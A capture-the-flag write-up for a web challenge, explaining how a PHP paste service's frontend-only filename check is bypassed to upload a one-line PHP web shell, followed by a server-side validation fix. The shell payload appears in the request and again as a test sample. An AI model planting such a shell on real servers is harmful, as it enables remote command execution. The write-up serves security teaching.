SCS

Description

SCS [Web]

We uncovered a code repository and it appears to be where ARIA is storing mission-critical code. We need to break in!

https://uscybercombine-s4-scs.chals.io/

Solution

Uploaded files are placed in the /uploads directory.

The backend technology is PHP.

The frontend restricts special characters in the file name:

Paste file name can only contain alphanumeric characters

But the restriction is bypassed by making a direct request to the backend.

Upload shell:

{
	"pasteContent": "<?PHP echo system($_REQUEST[0]); ?>",
	"pasteFileName":"t.php"
}

It works.

After some enumeration we find the location of the real flag.txt.
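
The root cause above is that the alphanumeric rule is applied by the frontend and not by the backend. A server-side version of that check, as an added example (not the challenge's code); the function name `resolvePastePath`, the storage directory and the forced `.txt` suffix are assumptions:

```php
<?php
declare(strict_types=1);

// Hypothetical storage location outside the web root (assumption), so a stored
// paste is never handed to the PHP interpreter by the web server.
const PASTE_DIR = '/var/lib/scs-pastes';

/**
 * Validate a paste request body server-side and return the path to write to.
 * Throws InvalidArgumentException on anything that fails the allowlist.
 */
function resolvePastePath(string $jsonBody, string $baseDir = PASTE_DIR): string
{
    $req = json_decode($jsonBody, true);
    if (!is_array($req)
        || !is_string($req['pasteFileName'] ?? null)
        || !is_string($req['pasteContent'] ?? null)) {
        throw new InvalidArgumentException('malformed request');
    }

    // Same rule the frontend states (alphanumeric only), enforced on the server.
    // \A and \z anchor the whole string; `$` alone would also match before a
    // trailing newline.
    if (preg_match('/\A[A-Za-z0-9]{1,64}\z/', $req['pasteFileName']) !== 1) {
        throw new InvalidArgumentException('file name must be alphanumeric');
    }

    // The server picks the extension; the client never controls it.
    return rtrim($baseDir, '/') . '/' . $req['pasteFileName'] . '.txt';
}

// Constructed sample bodies; the first is the request from this write-up.
$samples = [
    '{"pasteContent":"<?PHP echo system($_REQUEST[0]); ?>","pasteFileName":"t.php"}',
    '{"pasteContent":"hello","pasteFileName":"../notes"}',
    '{"pasteContent":"hello","pasteFileName":"notes1"}',
];

foreach ($samples as $body) {
    try {
        echo 'accepted -> ', resolvePastePath($body), PHP_EOL;
    } catch (InvalidArgumentException $e) {
        echo 'rejected: ', $e->getMessage(), PHP_EOL;
    }
}
```

Storing pastes outside the web root and fixing the extension server-side means that even a name that passes validation cannot be executed as PHP.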
